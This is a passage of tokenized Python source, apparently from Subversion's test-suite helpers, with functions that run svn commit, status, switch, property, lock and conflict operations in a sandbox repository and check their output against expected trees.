rm = re . compile ( error_re_string ) <EOL> match = None <EOL> for line in err : <EOL> match = rm . search ( line ) <EOL> if match : <EOL> break <EOL> if not match : <EOL> raise main . SVNUnmatchedError <EOL> elif err : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> for x in err : <EOL> logger . warn ( x ) <EOL> raise verify . SVNUnexpectedStderr <EOL> if dry_run and out != out_dry : <EOL> out_dry_expected = svntest . verify . UnorderedOutput ( out ) <EOL> verify . compare_and_display_lines ( '<STR_LIT>' , <EOL> '<STR_LIT>' , out_dry_expected , out_dry ) <EOL> def missing_skip ( a , b ) : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" , a . path ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise Failure <EOL> def extra_skip ( a , b ) : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" , a . path ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise Failure <EOL> myskiptree = tree . build_tree_from_skipped ( out ) <EOL> if isinstance ( skip_tree , wc . State ) : <EOL> skip_tree = skip_tree . old_tree ( ) <EOL> tree . compare_trees ( "<STR_LIT>" , myskiptree , skip_tree , <EOL> extra_skip , None , missing_skip , None ) <EOL> mytree = tree . build_tree_from_checkout ( out , <NUM_LIT:0> ) <EOL> if ( isinstance ( output_tree , list ) <EOL> or isinstance ( output_tree , verify . UnorderedOutput ) ) : <EOL> verify . verify_outputs ( None , out , err , output_tree , error_re_string ) <EOL> output_tree = None <EOL> verify_update ( mytree , None , None , dir , <EOL> output_tree , None , None , disk_tree , status_tree , <EOL> check_props = check_props ) <EOL> def run_and_verify_mergeinfo ( error_re_string = None , <EOL> expected_output = [ ] , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> mergeinfo_command = [ "<STR_LIT>" ] <EOL> mergeinfo_command . extend ( args ) <EOL> exit_code , out , err = main . run_svn ( error_re_string , * mergeinfo_command ) <EOL> if error_re_string : <EOL> if not error_re_string . startswith ( "<STR_LIT>" ) : <EOL> error_re_string = "<STR_LIT>" + error_re_string + "<STR_LIT:)>" <EOL> expected_err = verify . RegexOutput ( error_re_string , match_all = False ) <EOL> verify . verify_outputs ( None , None , err , None , expected_err ) <EOL> return <EOL> out = [ _f for _f in [ x . rstrip ( ) [ <NUM_LIT:1> : ] for x in out ] if _f ] <EOL> expected_output . sort ( ) <EOL> extra_out = [ ] <EOL> if out != expected_output : <EOL> exp_hash = dict . fromkeys ( expected_output ) <EOL> for rev in out : <EOL> if rev in exp_hash : <EOL> del ( exp_hash [ rev ] ) <EOL> else : <EOL> extra_out . append ( rev ) <EOL> extra_exp = list ( exp_hash . keys ( ) ) <EOL> raise Exception ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT:U+002CU+0020>' . join ( [ str ( x ) for x in extra_exp ] ) , <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ str ( x ) for x in extra_out ] ) ) ) <EOL> def run_and_verify_switch ( wc_dir_name , <EOL> wc_target , <EOL> switch_url , <EOL> output_tree , disk_tree , status_tree , <EOL> error_re_string = None , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None , <EOL> check_props = False , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> exit_code , output , errput = main . run_svn ( error_re_string , '<STR_LIT>' , <EOL> switch_url , wc_target , * args ) <EOL> if error_re_string : <EOL> if not error_re_string . startswith ( "<STR_LIT>" ) : <EOL> error_re_string = "<STR_LIT>" + error_re_string + "<STR_LIT:)>" <EOL> expected_err = verify . RegexOutput ( error_re_string , match_all = False ) <EOL> verify . verify_outputs ( None , None , errput , None , expected_err ) <EOL> return <EOL> elif errput : <EOL> raise verify . SVNUnexpectedStderr ( err ) <EOL> actual = wc . State . from_checkout ( output ) <EOL> verify_update ( actual , None , None , wc_dir_name , <EOL> output_tree , None , None , disk_tree , status_tree , <EOL> singleton_handler_a , a_baton , <EOL> singleton_handler_b , b_baton , <EOL> check_props ) <EOL> def process_output_for_commit ( output ) : <EOL> """<STR_LIT>""" <EOL> lastline = "<STR_LIT>" <EOL> rest = [ ] <EOL> def external_removal ( line ) : <EOL> return line . startswith ( '<STR_LIT>' ) or line . startswith ( '<STR_LIT>' ) <EOL> if len ( output ) : <EOL> lastline = output . pop ( ) . strip ( ) <EOL> while len ( output ) and external_removal ( lastline ) : <EOL> rest . append ( lastline ) <EOL> lastline = output . pop ( ) . strip ( ) <EOL> cm = re . compile ( "<STR_LIT>" ) <EOL> match = cm . search ( lastline ) <EOL> if not match : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( lastline ) <EOL> raise main . SVNCommitFailure <EOL> if len ( output ) : <EOL> lastline = output . pop ( ) <EOL> tm = re . compile ( "<STR_LIT>" ) <EOL> match = tm . search ( lastline ) <EOL> if not match : <EOL> output . append ( lastline ) <EOL> if len ( rest ) : <EOL> output . extend ( rest ) <EOL> return output <EOL> def run_and_verify_commit ( wc_dir_name , output_tree , status_tree , <EOL> error_re_string = None , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( output_tree , wc . State ) : <EOL> output_tree = output_tree . old_tree ( ) <EOL> if isinstance ( status_tree , wc . State ) : <EOL> status_tree = status_tree . old_tree ( ) <EOL> if '<STR_LIT>' not in args and '<STR_LIT>' not in args : <EOL> args = list ( args ) + [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> exit_code , output , errput = main . run_svn ( error_re_string , '<STR_LIT>' , <EOL> * args ) <EOL> if error_re_string : <EOL> if not error_re_string . startswith ( "<STR_LIT>" ) : <EOL> error_re_string = "<STR_LIT>" + error_re_string + "<STR_LIT:)>" <EOL> expected_err = verify . RegexOutput ( error_re_string , match_all = False ) <EOL> verify . verify_outputs ( None , None , errput , None , expected_err ) <EOL> return <EOL> output = process_output_for_commit ( output ) <EOL> actual = tree . build_tree_from_commit ( output ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual , output_tree ) <EOL> except tree . SVNTreeError : <EOL> verify . display_trees ( "<STR_LIT>" , <EOL> "<STR_LIT>" , output_tree , actual ) <EOL> _log_tree_state ( "<STR_LIT>" , actual , wc_dir_name ) <EOL> raise <EOL> if status_tree : <EOL> run_and_verify_status ( wc_dir_name , status_tree ) <EOL> def run_and_verify_status ( wc_dir_name , output_tree , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( output_tree , wc . State ) : <EOL> output_state = output_tree <EOL> output_tree = output_tree . old_tree ( ) <EOL> else : <EOL> output_state = None <EOL> exit_code , output , errput = main . run_svn ( None , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> wc_dir_name ) <EOL> actual = tree . build_tree_from_status ( output ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT:status>" , actual , output_tree , <EOL> singleton_handler_a , a_baton , <EOL> singleton_handler_b , b_baton ) <EOL> except tree . SVNTreeError : <EOL> verify . display_trees ( None , '<STR_LIT>' , output_tree , actual ) <EOL> _log_tree_state ( "<STR_LIT>" , actual , wc_dir_name ) <EOL> raise <EOL> if output_state : <EOL> entries_state = wc . State . from_entries ( wc_dir_name ) <EOL> if entries_state : <EOL> tweaked = output_state . copy ( ) <EOL> tweaked . tweak_for_entries_compare ( ) <EOL> try : <EOL> tweaked . compare_and_display ( '<STR_LIT>' , entries_state ) <EOL> except tree . SVNTreeUnequal : <EOL> raise <EOL> def run_and_verify_unquiet_status ( wc_dir_name , status_tree ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( status_tree , wc . State ) : <EOL> status_tree = status_tree . old_tree ( ) <EOL> exit_code , output , errput = main . run_svn ( None , '<STR_LIT:status>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , wc_dir_name ) <EOL> actual = tree . build_tree_from_status ( output ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual , status_tree ) <EOL> except tree . SVNTreeError : <EOL> _log_tree_state ( "<STR_LIT>" , actual , wc_dir_name ) <EOL> raise <EOL> def run_and_verify_status_xml ( expected_entries = [ ] , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> exit_code , output , errput = run_and_verify_svn ( None , None , [ ] , <EOL> '<STR_LIT:status>' , '<STR_LIT>' , * args ) <EOL> if len ( errput ) > <NUM_LIT:0> : <EOL> raise Failure <EOL> doc = parseString ( '<STR_LIT>' . join ( output ) ) <EOL> entries = doc . getElementsByTagName ( '<STR_LIT>' ) <EOL> def getText ( nodelist ) : <EOL> rc = [ ] <EOL> for node in nodelist : <EOL> if node . nodeType == node . TEXT_NODE : <EOL> rc . append ( node . data ) <EOL> return '<STR_LIT>' . join ( rc ) <EOL> actual_entries = { } <EOL> for entry in entries : <EOL> wcstatus = entry . getElementsByTagName ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> commit = entry . getElementsByTagName ( '<STR_LIT>' ) <EOL> author = entry . getElementsByTagName ( '<STR_LIT>' ) <EOL> rstatus = entry . getElementsByTagName ( '<STR_LIT>' ) <EOL> actual_entry = { '<STR_LIT>' : wcstatus . getAttribute ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : wcstatus . getAttribute ( '<STR_LIT>' ) , <EOL> } <EOL> if wcstatus . hasAttribute ( '<STR_LIT>' ) : <EOL> actual_entry [ '<STR_LIT>' ] = wcstatus . getAttribute ( '<STR_LIT>' ) <EOL> if ( commit ) : <EOL> actual_entry [ '<STR_LIT>' ] = commit [ <NUM_LIT:0> ] . getAttribute ( '<STR_LIT>' ) <EOL> if ( author ) : <EOL> actual_entry [ '<STR_LIT>' ] = getText ( author [ <NUM_LIT:0> ] . childNodes ) <EOL> if ( rstatus ) : <EOL> actual_entry [ '<STR_LIT>' ] = rstatus [ <NUM_LIT:0> ] . getAttribute ( '<STR_LIT>' ) <EOL> actual_entry [ '<STR_LIT>' ] = rstatus [ <NUM_LIT:0> ] . getAttribute ( '<STR_LIT>' ) <EOL> actual_entries [ entry . getAttribute ( '<STR_LIT:path>' ) ] = actual_entry <EOL> if expected_entries != actual_entries : <EOL> raise Failure ( '<STR_LIT:\n>' + '<STR_LIT:\n>' . join ( difflib . ndiff ( <EOL> pprint . pformat ( expected_entries ) . splitlines ( ) , <EOL> pprint . pformat ( actual_entries ) . splitlines ( ) ) ) ) <EOL> def run_and_verify_diff_summarize_xml ( error_re_string = [ ] , <EOL> expected_prefix = None , <EOL> expected_paths = [ ] , <EOL> expected_items = [ ] , <EOL> expected_props = [ ] , <EOL> expected_kinds = [ ] , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> exit_code , output , errput = run_and_verify_svn ( None , None , error_re_string , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , * args ) <EOL> if len ( errput ) > <NUM_LIT:0> : <EOL> return <EOL> doc = parseString ( '<STR_LIT>' . join ( output ) ) <EOL> paths = doc . getElementsByTagName ( "<STR_LIT:path>" ) <EOL> items = expected_items <EOL> kinds = expected_kinds <EOL> for path in paths : <EOL> modified_path = path . childNodes [ <NUM_LIT:0> ] . data <EOL> if ( expected_prefix is not None <EOL> and modified_path . find ( expected_prefix ) == <NUM_LIT:0> ) : <EOL> modified_path = modified_path . replace ( expected_prefix , '<STR_LIT>' ) [ <NUM_LIT:1> : ] . strip ( ) <EOL> if len ( modified_path ) == <NUM_LIT:0> : <EOL> modified_path = path . childNodes [ <NUM_LIT:0> ] . data . split ( os . sep ) [ - <NUM_LIT:1> ] <EOL> if os . sep != "<STR_LIT:/>" : <EOL> modified_path = modified_path . replace ( os . sep , "<STR_LIT:/>" ) <EOL> if modified_path not in expected_paths : <EOL> logger . warn ( "<STR_LIT>" , modified_path ) <EOL> raise Failure <EOL> index = expected_paths . index ( modified_path ) <EOL> expected_item = items [ index ] <EOL> expected_kind = kinds [ index ] <EOL> expected_prop = expected_props [ index ] <EOL> actual_item = path . getAttribute ( '<STR_LIT>' ) <EOL> actual_kind = path . getAttribute ( '<STR_LIT>' ) <EOL> actual_prop = path . getAttribute ( '<STR_LIT>' ) <EOL> if expected_item != actual_item : <EOL> logger . warn ( "<STR_LIT>" , expected_item , actual_item ) <EOL> raise Failure <EOL> if expected_kind != actual_kind : <EOL> logger . warn ( "<STR_LIT>" , expected_kind , actual_kind ) <EOL> raise Failure <EOL> if expected_prop != actual_prop : <EOL> logger . warn ( "<STR_LIT>" , expected_prop , actual_prop ) <EOL> raise Failure <EOL> def run_and_verify_diff_summarize ( output_tree , * args ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( output_tree , wc . State ) : <EOL> output_tree = output_tree . old_tree ( ) <EOL> exit_code , output , errput = main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , <EOL> * args ) <EOL> actual = tree . build_tree_from_diff_summarize ( output ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual , output_tree ) <EOL> except tree . SVNTreeError : <EOL> verify . display_trees ( None , '<STR_LIT>' , output_tree , actual ) <EOL> _log_tree_state ( "<STR_LIT>" , actual ) <EOL> raise <EOL> def run_and_validate_lock ( path , username ) : <EOL> """<STR_LIT>""" <EOL> comment = "<STR_LIT>" % path <EOL> run_and_verify_svn ( None , "<STR_LIT>" , [ ] , '<STR_LIT>' , <EOL> '<STR_LIT>' , username , <EOL> '<STR_LIT>' , comment , path ) <EOL> exit_code , output , err = run_and_verify_svn ( None , None , [ ] , <EOL> '<STR_LIT:info>' , '<STR_LIT>' , <EOL> path ) <EOL> token_re = re . compile ( "<STR_LIT>" , re . DOTALL ) <EOL> author_re = re . compile ( "<STR_LIT>" % username , re . DOTALL ) <EOL> created_re = re . compile ( "<STR_LIT>" , re . DOTALL ) <EOL> comment_re = re . compile ( "<STR_LIT>" % re . escape ( comment ) , re . DOTALL ) <EOL> output = "<STR_LIT>" . join ( output ) <EOL> if ( not ( token_re . match ( output ) and <EOL> author_re . match ( output ) and <EOL> created_re . match ( output ) and <EOL> comment_re . match ( output ) ) ) : <EOL> raise Failure <EOL> def _run_and_verify_resolve ( cmd , expected_paths , * args ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) == <NUM_LIT:0> : <EOL> args = expected_paths <EOL> expected_output = verify . UnorderedOutput ( [ <EOL> "<STR_LIT>" + path + "<STR_LIT>" for path in <EOL> expected_paths ] ) <EOL> run_and_verify_svn ( None , expected_output , [ ] , <EOL> cmd , * args ) <EOL> def run_and_verify_resolve ( expected_paths , * args ) : <EOL> """<STR_LIT>""" <EOL> _run_and_verify_resolve ( '<STR_LIT>' , expected_paths , * args ) <EOL> def run_and_verify_resolved ( expected_paths , * args ) : <EOL> """<STR_LIT>""" <EOL> _run_and_verify_resolve ( '<STR_LIT>' , expected_paths , * args ) <EOL> def run_and_verify_revert ( expected_paths , * args ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) == <NUM_LIT:0> : <EOL> args = expected_paths <EOL> expected_output = verify . UnorderedOutput ( [ <EOL> "<STR_LIT>" + path + "<STR_LIT>" for path in <EOL> expected_paths ] ) <EOL> run_and_verify_svn ( None , expected_output , [ ] , <EOL> "<STR_LIT>" , * args ) <EOL> def make_repo_and_wc ( sbox , create_wc = True , read_only = False , <EOL> minor_version = None ) : <EOL> """<STR_LIT>""" <EOL> if not read_only : <EOL> guarantee_greek_repository ( sbox . repo_dir , minor_version ) <EOL> if create_wc : <EOL> expected_output = main . greek_state . copy ( ) <EOL> expected_output . wc_dir = sbox . wc_dir <EOL> expected_output . tweak ( status = '<STR_LIT>' , contents = None ) <EOL> expected_wc = main . greek_state <EOL> run_and_verify_checkout ( sbox . repo_url , <EOL> sbox . wc_dir , <EOL> expected_output , <EOL> expected_wc ) <EOL> else : <EOL> try : <EOL> os . mkdir ( main . general_wc_dir ) <EOL> except OSError , err : <EOL> if err . errno != errno . EEXIST : <EOL> raise <EOL> def duplicate_dir ( wc_name , wc_copy_name ) : <EOL> """<STR_LIT>""" <EOL> main . safe_rmtree ( wc_copy_name ) <EOL> shutil . copytree ( wc_name , wc_copy_name ) <EOL> def get_virginal_state ( wc_dir , rev ) : <EOL> "<STR_LIT>" <EOL> rev = str ( rev ) <EOL> state = main . greek_state . copy ( ) <EOL> state . wc_dir = wc_dir <EOL> state . desc [ '<STR_LIT>' ] = wc . StateItem ( ) <EOL> state . tweak ( contents = None , status = '<STR_LIT:U+0020>' , wc_rev = rev ) <EOL> return state <EOL> def lock_admin_dir ( wc_dir , recursive = False ) : <EOL> "<STR_LIT>" <EOL> db , root_path , relpath = wc . open_wc_db ( wc_dir ) <EOL> svntest . main . run_wc_lock_tester ( recursive , wc_dir ) <EOL> def set_incomplete ( wc_dir , revision ) : <EOL> "<STR_LIT>" <EOL> svntest . main . run_wc_incomplete_tester ( wc_dir , revision ) <EOL> def get_wc_uuid ( wc_dir ) : <EOL> "<STR_LIT>" <EOL> return run_and_parse_info ( wc_dir ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> def get_wc_base_rev ( wc_dir ) : <EOL> "<STR_LIT>" <EOL> return run_and_parse_info ( wc_dir ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> def hook_failure_message ( hook_name ) : <EOL> """<STR_LIT>""" <EOL> if svntest . main . options . server_minor_version < <NUM_LIT:5> : <EOL> return "<STR_LIT>" % hook_name <EOL> else : <EOL> if hook_name in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> action = "<STR_LIT>" <EOL> elif hook_name == "<STR_LIT>" : <EOL> action = "<STR_LIT>" <EOL> elif hook_name == "<STR_LIT>" : <EOL> action = "<STR_LIT>" <EOL> elif hook_name == "<STR_LIT>" : <EOL> action = "<STR_LIT>" <EOL> else : <EOL> action = None <EOL> if action is None : <EOL> message = "<STR_LIT>" % ( hook_name , ) <EOL> else : <EOL> message = "<STR_LIT>" % ( action , hook_name ) <EOL> return message + "<STR_LIT>" <EOL> def create_failing_hook ( repo_dir , hook_name , text ) : <EOL> """<STR_LIT>""" <EOL> hook_path = os . path . join ( repo_dir , '<STR_LIT>' , hook_name ) <EOL> main . create_python_hook_script ( hook_path , '<STR_LIT>' <EOL> '<STR_LIT>' + repr ( text ) + '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def enable_revprop_changes ( repo_dir ) : <EOL> """<STR_LIT>""" <EOL> hook_path = main . get_pre_revprop_change_hook_path ( repo_dir ) <EOL> main . create_python_hook_script ( hook_path , '<STR_LIT>' , <EOL> cmd_alternative = '<STR_LIT>' ) <EOL> def disable_revprop_changes ( repo_dir ) : <EOL> """<STR_LIT>""" <EOL> hook_path = main . get_pre_revprop_change_hook_path ( repo_dir ) <EOL> main . create_python_hook_script ( hook_path , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> cmd_alternative = <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def create_failing_post_commit_hook ( repo_dir ) : <EOL> """<STR_LIT>""" <EOL> hook_path = main . get_post_commit_hook_path ( repo_dir ) <EOL> main . create_python_hook_script ( hook_path , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> cmd_alternative = <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def set_prop ( name , value , path , expected_re_string = None ) : <EOL> """<STR_LIT>""" <EOL> if value and ( value [ <NUM_LIT:0> ] == '<STR_LIT:->' or '<STR_LIT:\x00>' in value or sys . platform == '<STR_LIT:win32>' ) : <EOL> from tempfile import mkstemp <EOL> ( fd , value_file_path ) = mkstemp ( ) <EOL> os . close ( fd ) <EOL> value_file = open ( value_file_path , '<STR_LIT:wb>' ) <EOL> value_file . write ( value ) <EOL> value_file . flush ( ) <EOL> value_file . close ( ) <EOL> exit_code , out , err = main . run_svn ( expected_re_string , '<STR_LIT>' , <EOL> '<STR_LIT>' , value_file_path , name , path ) <EOL> os . remove ( value_file_path ) <EOL> else : <EOL> exit_code , out , err = main . run_svn ( expected_re_string , '<STR_LIT>' , <EOL> name , value , path ) <EOL> if expected_re_string : <EOL> if not expected_re_string . startswith ( "<STR_LIT>" ) : <EOL> expected_re_string = "<STR_LIT>" + expected_re_string + "<STR_LIT:)>" <EOL> expected_err = verify . RegexOutput ( expected_re_string , match_all = False ) <EOL> verify . verify_outputs ( None , None , err , None , expected_err ) <EOL> def check_prop ( name , path , exp_out , revprop = None ) : <EOL> """<STR_LIT>""" <EOL> if revprop is not None : <EOL> revprop_options = [ '<STR_LIT>' , '<STR_LIT>' , revprop ] <EOL> else : <EOL> revprop_options = [ ] <EOL> exit_code , out , err = main . run_command ( main . svn_binary , None , <NUM_LIT:1> , '<STR_LIT>' , <EOL> '<STR_LIT>' , name , path , <EOL> '<STR_LIT>' , <EOL> main . default_config_dir , <EOL> '<STR_LIT>' , main . wc_author , <EOL> '<STR_LIT>' , main . wc_passwd , <EOL> * revprop_options ) <EOL> if out != exp_out : <EOL> logger . warn ( "<STR_LIT>" , name ) <EOL> logger . warn ( "<STR_LIT>" , exp_out ) <EOL> logger . warn ( "<STR_LIT>" , out ) <EOL> raise Failure <EOL> def fill_file_with_lines ( wc_path , line_nbr , line_descrip = None , <EOL> append = True ) : <EOL> """<STR_LIT>""" <EOL> if line_descrip is None : <EOL> line_descrip = "<STR_LIT>" <EOL> contents = "<STR_LIT>" <EOL> for n in range ( line_nbr , line_nbr + <NUM_LIT:3> ) : <EOL> contents = contents + line_descrip + "<STR_LIT:U+0020>" + repr ( n ) + "<STR_LIT>" + os . path . basename ( wc_path ) + "<STR_LIT>" <EOL> if append : <EOL> main . file_append ( wc_path , contents ) <EOL> else : <EOL> main . file_write ( wc_path , contents ) <EOL> return contents <EOL> def inject_conflict_into_wc ( sbox , state_path , file_path , <EOL> expected_disk , expected_status , merged_rev ) : <EOL> """<STR_LIT>""" <EOL> wc_dir = sbox . wc_dir <EOL> contents = fill_file_with_lines ( file_path , <NUM_LIT:1> , "<STR_LIT>" , append = False ) <EOL> prev_rev = expected_status . desc [ state_path ] . wc_rev <EOL> expected_output = wc . State ( wc_dir , { <EOL> state_path : wc . StateItem ( verb = '<STR_LIT>' ) , <EOL> } ) <EOL> if expected_status : <EOL> expected_status . tweak ( state_path , wc_rev = merged_rev ) <EOL> run_and_verify_commit ( wc_dir , expected_output , expected_status , <EOL> None , file_path ) <EOL> exit_code , output , errput = main . run_svn ( None , "<STR_LIT>" , "<STR_LIT>" , str ( prev_rev ) , <EOL> file_path ) <EOL> if expected_status : <EOL> expected_status . tweak ( state_path , wc_rev = prev_rev ) <EOL> conflicting_contents = fill_file_with_lines ( file_path , <NUM_LIT:1> , "<STR_LIT>" , <EOL> append = False ) <EOL> if expected_disk : <EOL> expected_disk . tweak ( state_path , contents = "<STR_LIT>" ) <EOL> expected_output = wc . State ( wc_dir , { <EOL> state_path : wc . StateItem ( status = '<STR_LIT>' ) , <EOL> } ) <EOL> inject_conflict_into_expected_state ( state_path , <EOL> expected_disk , expected_status , <EOL> conflicting_contents , contents , <EOL> merged_rev ) <EOL> exit_code , output , errput = main . run_svn ( None , "<STR_LIT>" , "<STR_LIT>" , str ( merged_rev ) , <EOL> file_path ) <EOL> if expected_status : <EOL> expected_status . tweak ( state_path , wc_rev = merged_rev ) <EOL> def inject_conflict_into_expected_state ( state_path , <EOL> expected_disk , expected_status , <EOL> wc_text , merged_text , merged_rev ) : <EOL> """<STR_LIT>""" <EOL> if expected_disk : <EOL> conflict_marker = make_conflict_marker_text ( wc_text , merged_text , <EOL> merged_rev ) <EOL> existing_text = expected_disk . desc [ state_path ] . contents or "<STR_LIT>" <EOL> expected_disk . tweak ( state_path , contents = existing_text + conflict_marker ) <EOL> if expected_status : <EOL> expected_status . tweak ( state_path , status = '<STR_LIT>' ) <EOL> def make_conflict_marker_text ( wc_text , merged_text , merged_rev ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" + wc_text + "<STR_LIT>" + merged_text + "<STR_LIT>" + str ( merged_rev ) + "<STR_LIT:\n>" <EOL> def build_greek_tree_conflicts ( sbox ) : <EOL> """<STR_LIT>""" <EOL> sbox . build ( ) <EOL> wc_dir = sbox . wc_dir <EOL> j = os . path . join <EOL> G = j ( wc_dir , '<STR_LIT:A>' , '<STR_LIT:D>' , '<STR_LIT>' ) <EOL> pi = j ( G , '<STR_LIT>' ) <EOL> rho = j ( G , '<STR_LIT>' ) <EOL> tau = j ( G , '<STR_LIT>' ) <EOL> main . file_append ( pi , "<STR_LIT>" ) <EOL> main . run_svn ( None , '<STR_LIT>' , rho ) <EOL> main . run_svn ( None , '<STR_LIT>' , tau ) <EOL> expected_output = wc . State ( wc_dir , { <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( verb = '<STR_LIT>' ) , <EOL> } ) <EOL> expected_status = get_virginal_state ( wc_dir , <NUM_LIT:1> ) <EOL> expected_status . tweak ( '<STR_LIT>' , wc_rev = '<STR_LIT:2>' ) <EOL> expected_status . remove ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> run_and_verify_commit ( wc_dir , expected_output , expected_status , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , wc_dir ) <EOL> expected_output = wc . State ( wc_dir , { <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : Item ( status = '<STR_LIT>' ) , <EOL> } ) <EOL> expected_disk = main . greek_state <EOL> expected_status = get_virginal_state ( wc_dir , <NUM_LIT:1> ) <EOL> run_and_verify_update ( wc_dir , expected_output , expected_disk , <EOL> expected_status , None , None , None , None , None , False , <EOL> '<STR_LIT>' , '<STR_LIT:1>' , wc_dir ) <EOL> main . run_svn ( None , '<STR_LIT>' , pi ) <EOL> main . file_append ( rho , "<STR_LIT>" ) <EOL> main . run_svn ( None , '<STR_LIT>' , tau ) <EOL> run_and_verify_svn ( None , verify . AnyOutput , [ ] , '<STR_LIT>' , wc_dir ) <EOL> def make_deep_trees ( base ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> F = j ( base , '<STR_LIT:F>' ) <EOL> D = j ( base , '<STR_LIT:D>' ) <EOL> DF = j ( base , '<STR_LIT>' ) <EOL> DD = j ( base , '<STR_LIT>' ) <EOL> DDF = j ( base , '<STR_LIT>' ) <EOL> DDD = j ( base , '<STR_LIT>' ) <EOL> os . makedirs ( F ) <EOL> os . makedirs ( j ( D , '<STR_LIT>' ) ) <EOL> os . makedirs ( j ( DF , '<STR_LIT>' ) ) <EOL> os . makedirs ( j ( DD , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> os . makedirs ( j ( DDF , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> os . makedirs ( j ( DDD , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> alpha = j ( F , '<STR_LIT>' ) <EOL> beta = j ( DF , '<STR_LIT>' , '<STR_LIT>' ) <EOL> gamma = j ( DDF , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> main . file_append ( alpha , "<STR_LIT>" ) <EOL> main . file_append ( beta , "<STR_LIT>" ) <EOL> main . file_append ( gamma , "<STR_LIT>" ) <EOL> def add_deep_trees ( sbox , base_dir_name ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> base = j ( sbox . wc_dir , base_dir_name ) <EOL> make_deep_trees ( base ) <EOL> main . run_svn ( None , '<STR_LIT>' , base ) <EOL> Item = wc . StateItem <EOL> deep_trees_virginal_state = wc . State ( '<STR_LIT>' , { <EOL> '<STR_LIT:F>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT:D>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> '<STR_LIT>' : Item ( ) , <EOL> } ) <EOL> def deep_trees_leaf_edit ( base ) : <EOL> """<STR_LIT>""" <EOL> j = os . path . join <EOL> F = j ( base , '<STR_LIT:F>' , '<STR_LIT>' ) <EOL> DF = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> DDF = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> main . file_append ( F , "<STR_LIT>" ) <EOL> main . file_append ( DF , "<STR_LIT>" ) <EOL> main . file_append ( DDF , "<STR_LIT>" ) <EOL> run_and_verify_svn ( None , verify . AnyOutput , [ ] , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:1>' , F , DF , DDF ) <EOL> D = j ( base , '<STR_LIT:D>' , '<STR_LIT>' ) <EOL> DD = j ( base , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> 